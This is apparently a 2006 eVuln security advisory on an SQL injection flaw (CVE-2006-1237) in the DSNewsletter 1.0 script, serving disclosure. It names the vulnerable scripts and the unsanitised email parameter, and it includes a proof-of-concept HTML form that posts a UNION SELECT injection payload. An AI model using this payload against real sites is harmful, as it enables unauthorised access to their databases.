SQL Injection Vulnerability in DSNewsletter

Summary

Vulnerability: SQL Injection Vulnerability in DSNewsletter
Discovered: 2006.03.12
Last Update: 2006.03.23 Exploitation code published
ID: EV0097
CVE: CVE-2006-1237
Risk Level: medium
Type: SQL Injection
Status: Unpatched. No reply from developer(s)
Vendor: n/a
Vulnerable Software: DSNewsletter (http://dsportal.uw.hu/)
Version: 1.0
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in DSNewsletter (http://dsportal.uw.hu/) script.

Vulnerable scripts:
include/sub.php
include/confirm.php
include/unconfirm.php

Variable $email isn't properly sanitized before being used in the SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

SQL Injection example:

<form action=http://[host]/dsnews/index.php?open=newsletter method=post>
<input name=email value="asd' union select 1,2,3,4,5/*">
<input name=choice value=sub>
<input type=submit name=submit value=Send>
</form>

Solution.

Solution for "SQL Injection Vulnerability in DSNewsletter" is not available. Check vendor's website for updates.

SQL Injection Vulnerability in DSNewsletter

Summary

Description

PoC/Exploit

Solution.

Company

Services

eVuln Labs

eVuln Tools